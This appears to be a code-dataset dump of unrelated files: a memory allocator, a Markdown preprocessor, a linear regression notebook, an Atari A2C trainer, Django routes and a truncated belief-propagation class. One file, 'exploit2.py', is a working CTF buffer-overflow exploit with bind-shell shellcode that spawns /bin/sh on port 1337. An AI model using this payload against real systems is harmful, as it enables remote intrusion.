def firstfit(arr, sizes, n, arr2, numOfProcess):
initialiseBlocks(arr, sizes, n)
for i in range(numOfProcess):
for j in range(n):
if arr2[i].size <= arr[j].fragment:
arr[j].fragment -= arr2[i].size
arr2[i].block = Block()
arr2[i].block.size = arr[j].size
arr2[i].block.ID = arr[j].ID
arr2[i].block.fragment = arr[j].fragment
break
print("First Fit Allocation")
printResult(arr2, numOfProcess)
# Driver code
if __name__ == "__main__":
sizes = [60, 20, 12, 35, 64, 42, 31, 35, 40, 50]
arr = []
for i in range(10):
arr.append(Block())
initialiseBlocks(arr, sizes, 10)
numOfProcess = int(
input("Enter the number of process for memory to be allocated : ")
)
print("Enter the sizes required by the processes in the order of requirement")
psize = list(map(int, input().split(" ")))
arr2 = []
for i in range(numOfProcess):
arr2.append(process())
arr2[i].size = psize[i]
arr2[i].Num = i + 1
firstfit(arr, sizes, 10, arr2, numOfProcess)
"""
Sample I/O:
Enter the number of process for memory to be allocated : 5
Enter the sizes required by the processes in the order of requirement
15 12 13 20 11
First Fit Allocation
Process No Process Size Block ID Block Size Block Fragment
1 15 1 60 45
2 12 1 60 33
3 13 1 60 20
4 20 1 60 0
5 11 2 20 9
Time complexity : O(n)
space complexity : O(n)
"""
| 4.03125
| 4
|
verto/processors/CommentPreprocessor.py
|
uccser/verto
| 4
|
12780140
|
from markdown.preprocessors import Preprocessor
import re
class CommentPreprocessor(Preprocessor):
''' Searches a Document for comments (e.g. {comment example text here})
and removes them from the document.
'''
def __init__(self, ext, *args, **kwargs):
'''
Args:
ext: An instance of the Markdown parser class.
'''
super().__init__(*args, **kwargs)
self.processor = 'comment'
self.pattern = re.compile(ext.processor_info[self.processor]['pattern'])
def test(self, lines):
'''Return whether the provided document contains comments needing removal.
Args:
lines: A string of Markdown text.
Returns:
True if the document needs to be processed.
'''
return self.pattern.search(lines) is not None
def run(self, lines):
''' Removes all instances of text that match the following
example {comment example text here}. Inherited from
Preprocessor class.
Args:
lines: A list of lines of the Markdown document to be converted.
Returns:
Markdown document with comments removed.
'''
for i, line in enumerate(lines):
lines[i] = re.sub(self.pattern, '', line)
return lines
| 3.296875
| 3
|
LinearRegression/LinearRegression.py
|
saurabbhsp/machineLearning
| 3
|
12780141
|
# coding: utf-8
# In[1]:
get_ipython().run_cell_magic('javascript', '', '<!-- Ignore this block -->\nIPython.OutputArea.prototype._should_scroll = function(lines) {\n return false;\n}')
# ## Use housing data
# I have loaded the required modules. Pandas and Numpy. I have also included sqrt function from Math library.<br>
# I have imported division from future library. Remove this if the code is executed on Python 3. This import mimics behaviour of division operator of python 3 on python 2
# In[2]:
import pandas as pd
import numpy as np
from __future__ import division
from math import sqrt
""" File path change accordingly"""
inputFilepath = "data/house.csv"
"""Using default seperator"""
housingData = pd.read_csv(inputFilepath)
housingData.head(10)
# ### TextEncoder
#
# Here the data is mix of numbers and text. Text value cannot be directly used and should be converted to numeric data.<br>
# For this I have created a function text encoder which accepts a pandas series. Text encoder returns a lookUp dictionary for recreating the numeric value for text value and encoded text vector.
# For encoding I have applied a lambda function that will return value from dictionary.
# In[3]:
""" Converts the text features into numeric values so that they can be used by
the downstream algorithms.
Accepts pandas series and returns lookup dictionary and encoded vector"""
def textEncoder(textVector):
if type(textVector) == pd.core.series.Series:
lookUpDictionary = {}
lookupValue = 1
for key in textVector.unique():
lookUpDictionary[key] = lookupValue
lookupValue +=1
textVector = textVector.apply(lambda a: lookUpDictionary[a])
return lookUpDictionary,textVector
else:
raise TypeError("Expected a pandas series as an input")
# I have encoded nbhd and brick column using text encoder. The lookup dictionary is not used in downstream code. However any future predictions wil require text data to be encoded and hence I have provided the lookup dictionary.
# In[4]:
nbhdFeatureLookup, housingData['nbhd'] = textEncoder(housingData['nbhd'])
brickFeatureLookup, housingData['brick'] = textEncoder(housingData['brick'])
housingData.head(10)
# ### SplitDataSet Procedure
# This method splits the dataset into trainset and testset based upon the trainSetSize value. For splitting the dataset, I am using pandas.sample to split the data. This gives me trainset. For testset I am calculating complement of the trainset. This I am doing by droping the index present in training set.
# In[5]:
"""Splits the provided pandas dataframe into training and test dataset"""
def splitDataSet(inputDataframe, trainSetSize):
trainSet = inputDataframe.sample(frac=trainSetSize)
testSet = inputDataframe.drop(trainSet.index)
return trainSet,testSet
# ## 2. Choose those columns, which can help you in prediction i.e. contain some useful information. You can drop irrelevant columns. Give reason for choosing or dropping any column.
# ### generatePearsonCoefficient Procedure
# <img src="https://wikimedia.org/api/rest_v1/media/math/render/svg/f76ccfa7c2ed7f5b085115086107bbe25d329cec" />
# For sample:-
# <img src="https://wikimedia.org/api/rest_v1/media/math/render/svg/bd1ccc2979b0fd1c1aec96e386f686ae874f9ec0" />
# For selecting some features and for dropping others I am using Pearson's Coefficient. The value of Pearson's coefficient lies between [-1, 1] and tells how two features are related<br>
# <table>
# <tr><td>Strength of Association</td><td>Positive</td><td>Negative</td></tr><tr><td>Small</td><td>.1 to .3 </td><td>-0.1 to -0.3 </td></tr><tr><td>Medium</td><td>.3 to .5 </td><td>-0.3 to -0.5 </td></tr><tr><td>Large</td><td>.5 to 1.0 </td><td>-0.5 to -1.0 </td></tr></table>
#
# In[6]:
"""Generate pearson's coefficient"""
def generatePearsonCoefficient(A, B):
A_meanDiff = A - A.mean()
B_meanDiff = B - B.mean()
return ((A_meanDiff * B_meanDiff).sum())/(sqrt((
A_meanDiff * A_meanDiff).sum()) * sqrt((B_meanDiff * B_meanDiff).sum()))
# In[7]:
"""Generate the value of pearson constant for all the features"""
print("Pearson's coefficient of corelation for "+
"nbhd and price is "+ str(generatePearsonCoefficient(housingData.nbhd,housingData.price)))
print("Pearson's coefficient of corelation for "+
"offers and price is "+ str(generatePearsonCoefficient(housingData.offers,housingData.price)))
print("Pearson's coefficient of corelation for "+
"sqft and price is "+ str(generatePearsonCoefficient(housingData.sqft,housingData.price)))
print("Pearson's coefficient of corelation for "+
"bedrooms and price is "+ str(generatePearsonCoefficient(housingData.bedrooms,housingData.price)))
print("Pearson's coefficient of corelation for "+
"bathrooms and price is "+ str(generatePearsonCoefficient(housingData.bathrooms,housingData.price)))
print("Pearson's coefficient of corelation for "+
"brick and price is "+ str(generatePearsonCoefficient(housingData.brick,housingData.price)))
# The value of Pearson's constant suggests that sqft, bedroom and bathroonm have strong corelation with price. Offers has a weak negative corelation and nbhd and brick has mediup corelation with price. I am keeping all the features as they have some corelation with the data.
# # Visualizing the relation between the X and Y
# Here I have used subplots to plot different X features and their relation with Y.
# In[8]:
import matplotlib.pyplot as plt
"""Set global rcParams for pyplotlib"""
plt.rcParams["figure.figsize"] = "18,15"
figure, ((ax1, ax2), (ax3, ax4), (ax5, ax6)) = plt.subplots(3,2,sharey='none')
ax1.plot(housingData.nbhd,housingData.price,"ro")
ax1.grid()
ax1.set_title("nbhd vs price")
ax2.plot(housingData.offers,housingData.price,"ro")
ax2.grid()
ax2.set_title("no of offers vs price")
ax3.plot(housingData.sqft,housingData.price,"ro")
ax3.grid()
ax3.set_title("sqft vs price")
ax4.plot(housingData.brick,housingData.price,"ro")
ax4.grid()
ax4.set_title("brick vs price")
ax5.plot(housingData.bedrooms,housingData.price,"ro")
ax5.grid()
ax5.set_title("no of bedrooms vs price")
ax6.plot(housingData.bathrooms,housingData.price,"ro")
ax6.grid()
ax6.set_title("bathrooms vs price")
plt.show()
# ### gaussianSolverProcedure
# <b>Algorithm:-</b><br>
# <b>Step-1</b><br>
# Generate an augmented matrix.<br>
# <b>Step-2</b><br>
# Calculate pivot for a given column. Pivot is defined as a largest value in column following its index.<br>
# <b>Step-3</b><br>
# Place the piviot in the current row column.(Swap the row)<br>
# <b>Step-4</b><br>
# Make the value of other elements under pivot as zero. Use only row operations for this. Repeat this untill we get a upper triangular matrix.<br>
# <b>Step-5</b><br>
# Solve the upper trangular matrix using backward substitution.<br><br>
#
# The gaussian solver accepts two matrices A and B and tries to solve for x such that Ax = B
#
# In[9]:
"""Method for solving system of linear equations using gaussian elimination method"""
def gaussianSolver(A,B):
augmentedMatrix = np.hstack((A,B)) * 1.0
n = augmentedMatrix.shape[0]
for i in range(0, n):
"""Set default pivot value as diagonal matrix """
pivot = augmentedMatrix[i][i]
pivotRow = i
"""Check for a bigger pivot value"""
for j in range(i+1, n):
if abs(augmentedMatrix[j][i]) > abs(pivot):
pivot = augmentedMatrix[j][i]
pivotRow = j
"""If pivot has changed. Swap the rows"""
if pivotRow != i:
for j in range(0, n+1):
augmentedMatrix[pivotRow][j], augmentedMatrix[i][j] = augmentedMatrix[i][j], augmentedMatrix[pivotRow][j]
"""Make all the column values below pivot as zero by performing matrix row operations"""
for j in range(i+1, n):
op = -1 * (augmentedMatrix[j][i]/augmentedMatrix[i][i])
for k in range(0, n+1):
augmentedMatrix[j][k] = augmentedMatrix[j][k] + ( op * augmentedMatrix[i][k] )
""" Backward substitution to get values for B"""
beta = np.zeros(n)
for i in range(n - 1, -1,-1):
diff = 0
for k in range (i + 1, n):
diff = diff + (beta[k] * augmentedMatrix[i][k])
beta[i] = (augmentedMatrix[i][n] - diff)/augmentedMatrix[i][i]
return beta
# ### choleskyDecompositionSolver Procedure
# As per cholesky decomposition a positive definite matrix A can be represented as L.L<sup>T</sup> where L<sup>T</sup> is lower trangular matrix and L<sup>T</sup> is it's transpose.<br>
# Here L is called cholesky factor<br>
# The problem comes down to L.L<sup>T</sup>x = B<br>
# <img src="https://wikimedia.org/api/rest_v1/media/math/render/svg/abf826b0ffb86e190d432828d7485f52f618eaed" />
# <img src="https://wikimedia.org/api/rest_v1/media/math/render/svg/bb5adc5916e0762b2eca921de3e70ccae9bd2999" />
#
# <b>Algorithm:-</b><br>
# <b>Step-1</b><br>
# Initialize a zero matrix<br>
# <b>Step-2</b><br>
# Calculate L using the above formula. If calculating for a diagonal element then stop the procedure and move to calculate for next row. This will generate lower trangular matrix<br/>
# <b>Step-3</b><br>
# Calculate vector Y using forward substitution. LY = b<br>
# <b>Step-4</b><br>
# Calculate vector X using backward substitution.L*X = Y<br>
# In[10]:
"""Method for solving the system of linear equations using cholesky decomposition"""
def choleskyDecompositionSolver(A, B):
"""Converting the matrix values to float"""
A = A * 1.0
B = B * 1.0
n = A.shape[0]
if A.shape[0] == A.shape[1]:
"""Generate cholesky factor"""
L = np.zeros(shape = A.shape)
for i in range(0, n):
for j in range (0, n):
L[i][j] = A[i][j]
"""Calculating diagonal elements"""
if i == j:
for k in range(0, j):
L[i][j] = L[i][j] - (L[i][k] * L[i][k])
L[i][j] = sqrt(L[i][j])
break;
"""Calculating non diagonal elements"""
product = 0
for k in range (0, j):
product = product + (L[i][k] * L[j][k])
L[i][j] = (L[i][j] - product)/L[j][j]
"""Solving the system of linear equation
Ax=b
A can be decomposed into LU such that
Ly=b
Ux=y """
"""Forward substitution"""
Y = np.zeros(n)
for i in range(0, n):
diff = 0
for k in range (i -1, -1, -1):
diff = diff + (Y[k] * L[i][k])
Y[i] = (B[i] - diff)/L[i][i]
"""Backward substitution"""
beta = np.zeros(n)
U = L.T
for i in range(n - 1, -1,-1):
diff = 0
for k in range (i + 1, n):
diff = diff + (beta[k] * U[i][k])
beta[i] = (Y[i] - diff)/U[i][i]
return beta
else:
raise ValueError("Matrix A is not symmetric")
# ### qrDecompositionSolver Procedure
# A matrix A can be represented as product of Q and R where Q is orthogonal matrix (Q<sup>T</sup>Q = QQ<sup>T</sup> = I) and R is upper triangular matrix.
# <img src="https://wikimedia.org/api/rest_v1/media/math/render/svg/4b845398dd7df51edc31561a612423b20a83eb04" />
# <img src="https://wikimedia.org/api/rest_v1/media/math/render/svg/74356955f03f5c1171e9e812174a715eb112aef8" />
# <br>QR decompsition can be done in four steps
# <ul><li>Calculation of orthogonal basis</li><li>Calculation of orthonormal</li><li>QR factor calculation</li><li>Solving system of linear equation</li></ul>
# <br>
# <b>Algorithm:-</b><br>
# <b>Step-1</b><br>
# Calculate orthogonal basis using gram Schmidt method. For first vector the value is itself. For subsequent vectors the orthogonalbasis is vector - projection on perviously calculated orthogonal basis
# <br><b>Step-2</b><br>
# For calculating orthonormal we divide orthogonal basis by magnitude of respective vectors
# <br><b>Step-3</b><br>
# Q = [orthonormalBasis]<br>
# R = Q<sup>T</sup>A
# <br><b>Step-4</b><br>
# For calculating the value of X in AX = B,<br>
# We calculate Y = Q<sup>T</sup>B<br>
# We solve RX = Y using backward substitution
#
# In[11]:
"""QR decomposition can be done in three steps
1) Calculation orthogonal basis
2) Calculation orthonormal
3) QR factor calculation"""
def qrDecompositionSolver(A, B):
A = A * 1.0
B = B * 1.0
"""Calculating the orthogonal basis"""
n = A.shape[1]
# Store deepcopy of A for processing
orthoBasis = np.array(A, copy = True)
for i in range(1, n):
"""Calculate the projections"""
diff = 0
for j in range(i-1, -1, -1):
diff = diff + (np.dot(orthoBasis[:,i],
orthoBasis[:,j])/np.dot(orthoBasis[:,j],orthoBasis[:,j]))*orthoBasis[:,j]
orthoBasis[:,i] = orthoBasis[:,i] - diff
"""Calculating orthonormal"""
for i in range(0, n):
orthoBasis[:,i] = orthoBasis[:,i]/np.sqrt(np.sum(np.square(orthoBasis[:,i])))
"""QR factorization"""
Q = orthoBasis
R = np.dot(orthoBasis.T,A)
"""Solving system of linear equation"""
B = np.dot(Q.T,B)
"""Backward substitution"""
beta = np.zeros(n)
for i in range(n - 1, -1,-1):
diff = 0
for k in range (i + 1, n):
diff = diff + (beta[k] * R[i][k])
beta[i] = (B[i] - diff)/R[i][i]
return beta
# ### learnLinregNormEq
# Solves system of linear equation in form of <br>
# X<sup>T</sup>XB = X<sup>T</sup>Y<br>
# Accepts three arguments X, Y and solver. Default value for solver is gaussianSolver
# In[12]:
"""Method to learn linear regression using normal equations. Default solver is
gaussian solver"""
def learnLinregNormEq(X, Y, solver = gaussianSolver):
if isinstance(X,np.ndarray) and isinstance(Y,np.ndarray):
if X.shape[0] != Y.shape[0]:
raise ValueError("The shape of X and Y is inconsistant")
X = np.insert(X, 0, 1, axis=1)
Xtranspose = X.T
XtX = np.dot(Xtranspose,X)
XtY = np.dot(Xtranspose,Y)
return solver(XtX, XtY)
else:
raise TypeError("Expected X and Y as numpy.ndarray")
# ### predictLinearRegression Procedure
# This method performs predicts the value for Y given X and model parameters. This method will add bias to X.
# In[13]:
"""Method to make prediction for yTest"""
def predictionLinearRegression(X, modelParameters):
X = np.insert(X, 0, 1, axis=1)
yPrediction = np.dot(X,modelParameters.T)
return yPrediction
# ### RMSE procedure
# Will calculate root mean squared error for given Ytrue values and YPrediction
#
# In[14]:
"""Model accuracy estimator RMSE"""
def RMSE(yTrue, yPrediction):
n = yTrue.shape[0]
return sqrt((1.0) * np.sum(np.square((yTrue - yPrediction))))/n
# # Solving the linear equations using gaussianSolver
# Here I am splitting the dataset into training and test set. For this I am using splitDataSet procedure with 80-20 split.<br>
# I have taken all the features.
# In[15]:
trainSet,testSet = splitDataSet(housingData,0.8)
Ytrain = trainSet.as_matrix(columns=['price'])
Ytest = testSet.as_matrix(columns=['price'])
print("Total items in training set "+str(Ytrain.shape))
print("Total items in test set "+str(Ytest.shape))
Xtrain = trainSet.as_matrix(columns = ['sqft','bedrooms','bathrooms','brick','nbhd','offers'])
Xtest = testSet.as_matrix(columns = ['sqft','bedrooms','bathrooms','brick','nbhd','offers'])
# I am learning linear regression using default (Gaussian) solver. I am making predictions using predictionLinearRegression procedure. I am calculating the RMSE using RMSE procedure and average of residuals using mean.
# In[16]:
"""Learn model parameters using gaussian solver"""
modelParamsGaussian = learnLinregNormEq(Xtrain, Ytrain)
"""Make prediction using modelParams"""
yPredictionGaussian = predictionLinearRegression(Xtest, modelParamsGaussian)
"""Calulate RMSE"""
print("RMSE for gaussian solver is "+str(RMSE(Ytest.flatten(),yPredictionGaussian)))
print("Average residual for gaussian solver is "+str((Ytest.flatten() - yPredictionGaussian).mean()))
# In[17]:
plt.plot(yPredictionGaussian - Ytest.flatten(), Ytest,"ro",label="ytest - ybar vs ytest")
plt.title("Plot for gaussian solver")
plt.xlabel("ytest - ybar")
plt.ylabel("ytest")
plt.show()
# # Solving the system of equations using Cholesky method
# In[18]:
trainSet,testSet = splitDataSet(housingData,0.8)
Ytrain = trainSet.as_matrix(columns=['price'])
Ytest = testSet.as_matrix(columns=['price'])
print("Total items in training set "+str(Ytrain.shape))
print("Total items in test set "+str(Ytest.shape))
Xtrain = trainSet.as_matrix(columns = ['sqft','bedrooms','bathrooms','brick','nbhd','offers'])
Xtest = testSet.as_matrix(columns = ['sqft','bedrooms','bathrooms','brick','nbhd','offers'])
# In[19]:
"""Learn model parameters using Cholesky solver"""
modelParamsCholesky = learnLinregNormEq(Xtrain, Ytrain,choleskyDecompositionSolver)
"""Make prediction using modelParams"""
yPredictionCholesky = predictionLinearRegression(Xtest, modelParamsCholesky)
"""Calulate RMSE"""
print("RMSE for Cholesky solver is "+str(RMSE(Ytest.flatten(),yPredictionCholesky)))
print("Average residual for Cholesky solver is "+str((Ytest.flatten() - yPredictionCholesky).mean()))
# In[20]:
plt.plot(yPredictionCholesky - Ytest.flatten(), Ytest,"bo",label="ytest - ybar vs ytest")
plt.title("Plot for Cholesky solver")
plt.xlabel("ytest - ybar")
plt.ylabel("ytest")
plt.show()
# # Solving the system of equations using QR decomposition method
# In[21]:
trainSet,testSet = splitDataSet(housingData,0.8)
Ytrain = trainSet.as_matrix(columns=['price'])
Ytest = testSet.as_matrix(columns=['price'])
print("Total items in training set "+str(Ytrain.shape))
print("Total items in test set "+str(Ytest.shape))
Xtrain = trainSet.as_matrix(columns = ['sqft','bedrooms','bathrooms','brick','nbhd','offers'])
Xtest = testSet.as_matrix(columns = ['sqft','bedrooms','bathrooms','brick','nbhd','offers'])
# In[22]:
"""Learn model parameters using QR Decomposition solver"""
modelParamsQR = learnLinregNormEq(Xtrain, Ytrain,qrDecompositionSolver)
"""Make prediction using modelParams"""
yPredictionQR = predictionLinearRegression(Xtest, modelParamsQR)
"""Calulate RMSE"""
print("RMSE for QR Decomposition solver is "+str(RMSE(Ytest.flatten(),yPredictionQR)))
print("Average residual for QR Decomposition solver is "+str((Ytest.flatten() - yPredictionQR).mean()))
# In[23]:
plt.plot(yPredictionQR - Ytest.flatten(), Ytest,"go",label="ytest - ybar vs ytest")
plt.title("Plot for QR decomposition solver")
plt.xlabel("ytest - ybar")
plt.ylabel("ytest")
plt.show()
| 3.40625
| 3
|
atari_a2c.py
|
godka/mario_rl
| 0
|
12780142
|
<filename>atari_a2c.py
import gym
import os
import random
from itertools import chain
import numpy as np
import torch.nn.functional as F
import torch.nn as nn
import torch
import cv2
from model import *
import torch.optim as optim
from torch.multiprocessing import Pipe, Process
from collections import deque
from tensorboardX import SummaryWriter
class AtariEnvironment(Process):
def __init__(
self,
env_id,
is_render,
env_idx,
child_conn,
history_size=4,
h=84,
w=84):
super(AtariEnvironment, self).__init__()
self.daemon = True
self.env = gym.make(env_id)
self.env_id = env_id
self.is_render = is_render
self.env_idx = env_idx
self.steps = 0
self.episode = 0
self.rall = 0
self.recent_rlist = deque(maxlen=100)
self.child_conn = child_conn
self.history_size = history_size
self.history = np.zeros([history_size, h, w])
self.h = h
self.w = w
self.reset()
self.lives = self.env.env.ale.lives()
def run(self):
super(AtariEnvironment, self).run()
while True:
action = self.child_conn.recv()
if self.is_render:
self.env.render()
if 'Breakout' in self.env_id:
action += 1
_, reward, done, info = self.env.step(action)
if life_done:
if self.lives > info['ale.lives'] and info['ale.lives'] > 0:
force_done = True
self.lives = info['ale.lives']
else:
force_done = done
else:
force_done = done
self.history[:3, :, :] = self.history[1:, :, :]
self.history[3, :, :] = self.pre_proc(
self.env.env.ale.getScreenGrayscale().squeeze().astype('float32'))
self.rall += reward
self.steps += 1
if done:
self.recent_rlist.append(self.rall)
print("[Episode {}({})] Step: {} Reward: {} Recent Reward: {}".format(
self.episode, self.env_idx, self.steps, self.rall, np.mean(self.recent_rlist)))
self.history = self.reset()
self.child_conn.send(
[self.history[:, :, :], reward, force_done, done])
def reset(self):
self.steps = 0
self.episode += 1
self.rall = 0
self.env.reset()
self.lives = self.env.env.ale.lives()
self.get_init_state(
self.env.env.ale.getScreenGrayscale().squeeze().astype('float32'))
return self.history[:, :, :]
def pre_proc(self, X):
x = cv2.resize(X, (self.h, self.w))
x *= (1.0 / 255.0)
return x
def get_init_state(self, s):
for i in range(self.history_size):
self.history[i, :, :] = self.pre_proc(s)
class ActorAgent(object):
def __init__(
self,
input_size,
output_size,
num_env,
num_step,
gamma,
lam=0.95,
use_gae=True,
use_cuda=False,
use_noisy_net=False):
self.model = CnnActorCriticNetwork(
input_size, output_size, use_noisy_net)
self.num_env = num_env
self.output_size = output_size
self.input_size = input_size
self.num_step = num_step
self.gamma = gamma
self.lam = lam
self.use_gae = use_gae
self.optimizer = optim.Adam(self.model.parameters(), lr=learning_rate)
self.device = torch.device('cuda' if use_cuda else 'cpu')
self.model = self.model.to(self.device)
def get_action(self, state):
state = torch.Tensor(state).to(self.device)
state = state.float()
policy, value = self.model(state)
policy = F.softmax(policy, dim=-1).data.cpu().numpy()
action = self.random_choice_prob_index(policy)
return action
@staticmethod
def random_choice_prob_index(p, axis=1):
r = np.expand_dims(np.random.rand(p.shape[1 - axis]), axis=axis)
return (p.cumsum(axis=axis) > r).argmax(axis=axis)
def forward_transition(self, state, next_state):
state = torch.from_numpy(state).to(self.device)
state = state.float()
policy, value = agent.model(state)
next_state = torch.from_numpy(next_state).to(self.device)
next_state = next_state.float()
_, next_value = agent.model(next_state)
value = value.data.cpu().numpy().squeeze()
next_value = next_value.data.cpu().numpy().squeeze()
return value, next_value, policy
def train_model(self, s_batch, target_batch, y_batch, adv_batch):
with torch.no_grad():
s_batch = torch.FloatTensor(s_batch).to(self.device)
target_batch = torch.FloatTensor(target_batch).to(self.device)
y_batch = torch.LongTensor(y_batch).to(self.device)
adv_batch = torch.FloatTensor(adv_batch).to(self.device)
# for multiply advantage
policy, value = self.model(s_batch)
m = Categorical(F.softmax(policy, dim=-1))
# mse = nn.SmoothL1Loss()
mse = nn.MSELoss()
# Actor loss
actor_loss = -m.log_prob(y_batch) * adv_batch
# Entropy(for more exploration)
entropy = m.entropy()
# Critic loss
critic_loss = mse(value.sum(1), target_batch)
# Total loss
loss = actor_loss.mean() + 0.5 * critic_loss - entropy_coef * entropy.mean()
self.optimizer.zero_grad()
loss.backward()
torch.nn.utils.clip_grad_norm_(self.model.parameters(), clip_grad_norm)
self.optimizer.step()
def make_train_data(reward, done, value, next_value):
discounted_return = np.empty([num_step])
if use_standardization:
reward = (reward - np.mean(reward)) / (np.std(reward) + stable_eps)
# Discounted Return
if use_gae:
gae = 0
for t in range(num_step - 1, -1, -1):
delta = reward[t] + gamma * \
next_value[t] * (1 - done[t]) - value[t]
gae = delta + gamma * lam * (1 - done[t]) * gae
discounted_return[t] = gae + value[t]
# For Actor
adv = discounted_return - value
else:
running_add = next_value[-1]
for t in range(num_step - 1, -1, -1):
running_add = reward[t] + gamma * running_add * (1 - done[t])
discounted_return[t] = running_add
# For Actor
adv = discounted_return - value
if use_standardization:
adv = (adv - np.mean(adv)) / (np.std(adv) + stable_eps)
return discounted_return, adv
if __name__ == '__main__':
env_id = 'BreakoutDeterministic-v4'
env = gym.make(env_id)
input_size = env.observation_space.shape # 4
output_size = env.action_space.n # 2
if 'Breakout' in env_id:
output_size -= 1
env.close()
writer = SummaryWriter()
use_cuda = True
use_gae = False
is_load_model = False
is_render = False
use_standardization = False
lr_schedule = False
life_done = True
use_noisy_net = False
model_path = 'models/{}.model'.format(env_id)
lam = 0.95
num_worker = 16
num_worker_per_env = 1
num_step = 5
max_step = 1.15e8
learning_rate = 0.00025
stable_eps = 1e-30
epslion = 0.1
entropy_coef = 0.01
alpha = 0.99
gamma = 0.99
clip_grad_norm = 3.0
agent = ActorAgent(
input_size,
output_size,
num_worker_per_env *
num_worker,
num_step,
gamma,
use_cuda=use_cuda,
use_noisy_net=use_noisy_net)
if is_load_model:
agent.model.load_state_dict(torch.load(model_path))
works = []
parent_conns = []
child_conns = []
for idx in range(num_worker):
parent_conn, child_conn = Pipe()
work = AtariEnvironment(env_id, is_render, idx, child_conn)
work.start()
works.append(work)
parent_conns.append(parent_conn)
child_conns.append(child_conn)
states = np.zeros([num_worker * num_worker_per_env, 4, 84, 84])
sample_episode = 0
sample_rall = 0
sample_step = 0
sample_env_idx = 0
global_step = 0
recent_prob = deque(maxlen=10)
while True:
total_state, total_reward, total_done, total_next_state, total_action = [], [], [], [], []
global_step += (num_worker * num_step)
for _ in range(num_step):
actions = agent.get_action(states)
for parent_conn, action in zip(parent_conns, actions):
parent_conn.send(action)
next_states, rewards, dones, real_dones = [], [], [], []
for parent_conn in parent_conns:
s, r, d, rd = parent_conn.recv()
next_states.append(s)
rewards.append(r)
dones.append(d)
real_dones.append(rd)
next_states = np.stack(next_states)
rewards = np.hstack(rewards)
dones = np.hstack(dones)
real_dones = np.hstack(real_dones)
total_state.append(states)
total_next_state.append(next_states)
total_reward.append(rewards)
total_done.append(dones)
total_action.append(actions)
states = next_states[:, :, :, :]
sample_rall += rewards[sample_env_idx]
sample_step += 1
if real_dones[sample_env_idx]:
sample_episode += 1
writer.add_scalar('data/reward', sample_rall, sample_episode)
writer.add_scalar('data/step', sample_step, sample_episode)
sample_rall = 0
sample_step = 0
total_state = np.stack(total_state).transpose(
[1, 0, 2, 3, 4]).reshape([-1, 4, 84, 84])
total_next_state = np.stack(total_next_state).transpose(
[1, 0, 2, 3, 4]).reshape([-1, 4, 84, 84])
total_reward = np.stack(
total_reward).transpose().reshape([-1]).clip(-1, 1)
total_action = np.stack(total_action).transpose().reshape([-1])
total_done = np.stack(total_done).transpose().reshape([-1])
value, next_value, policy = agent.forward_transition(
total_state, total_next_state)
policy = policy.detach()
m = F.softmax(policy, dim=-1)
recent_prob.append(m.max(1)[0].mean().cpu().numpy())
writer.add_scalar(
'data/max_prob',
np.mean(recent_prob),
sample_episode)
total_target = []
total_adv = []
for idx in range(num_worker):
target, adv = make_train_data(total_reward[idx * num_step:(idx + 1) * num_step],
total_done[idx *
num_step:(idx + 1) * num_step],
value[idx *
num_step:(idx + 1) * num_step],
next_value[idx * num_step:(idx + 1) * num_step])
# print(target.shape)
total_target.append(target)
total_adv.append(adv)
agent.train_model(
total_state,
np.hstack(total_target),
total_action,
np.hstack(total_adv))
# adjust learning rate
if lr_schedule:
new_learing_rate = learning_rate - \
(global_step / max_step) * learning_rate
for param_group in agent.optimizer.param_groups:
param_group['lr'] = new_learing_rate
writer.add_scalar('data/lr', new_learing_rate, sample_episode)
if global_step % (num_worker * num_step * 100) == 0:
torch.save(agent.model.state_dict(), model_path)
| 2.28125
| 2
|
award/urls.py
|
stevekibe/Awards
| 0
|
12780143
|
from django.conf import settings
from django.conf.urls.static import static
from django.conf.urls import url
from . import views
urlpatterns=[
url('^$',views.index,name='index'),
url(r'^new/post$',views.new_project, name='new-project'),
url(r'votes/$',views.vote_project, name='vote_project'),
url(r'^user/(\d+)$',views.detail, name='detail'),
url(r'^detail/edit/$', views.edit_detail, name='edit-detail'),
url(r'^viewproject/(\d+)$',views.view_project, name = 'viewproject') ,
url(r'^search/$', views.search_results, name='search-project'),
url(r'^comment/(?P<project_id>\d+)', views.add_comment, name='comment'),
url(r'^vote/(?P<project_id>\d+)', views.vote, name='vote'),
]
if settings.DEBUG:
urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
| 1.914063
| 2
|
2013/CSAW/exploit2.py
|
parksjin01/ctf
| 0
|
12780144
|
<gh_stars>0
from pwn import *
import binascii
sh = remote('localhost', 31338)
buf_addr = sh.recv(4)
secret = sh.recv(4)
print binascii.hexlify(secret)
shellcode = "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"
payload = shellcode+'A'*(0x800-len(shellcode))+secret+'C'*12+buf_addr
print sh.recv(1024)
raw_input()
sh.sendline(payload)
new_sh = remote('localhost', 1337)
new_sh.interactive()
| 1.8125
| 2
|
mrftools/ConvexBeliefPropagator.py
|
berty38/mrftools
| 0
|
12780145
|
"""Convexified Belief Propagation Class"""
import numpy as np
from .MatrixBeliefPropagator import MatrixBeliefPropagator, logsumexp, sparse_dot
class ConvexBeliefPropagator(MatrixBeliefPropagator):
"""
Class to perform convexified belief propagation based on counting numbers. The class allows for non-Bethe
counting numbers for the different factors in the MRF. If the factors are all non-negative, then the adjusted
Bethe free energy is convex, providing better guarantees about the convergence and bounds of the primal
and dual objective values.
"""
def __init__(self, markov_net, counting_numbers=None):
"""
Initialize a convexified belief propagator.
:param markov_net: MarkovNet object encoding the probability distribution
:type markov_net: MarkovNet
:param counting_numbers: a dictionary with an entry for each variable and edge such that the value is a float
representing the counting number to use in computing the convexified Bethe formulas
and corresponding message passing updates.
:type counting_numbers: dict
"""
super(ConvexBeliefPropagator, self).__init__(markov_net)
self.unary_counting_numbers = np.ones(len(self.mn.variables))
self.edge_counting_numbers = np.ones(2 * self.mn.num_edges)
default_counting_numbers = dict()
for var in markov_net.variables:
default_counting_numbers[var] = 1
for neighbor in markov_net.neighbors[var]:
if var < neighbor:
default_counting_numbers[(var, neighbor)] = 1
if counting_numbers:
self._set_counting_numbers(counting_numbers)
else:
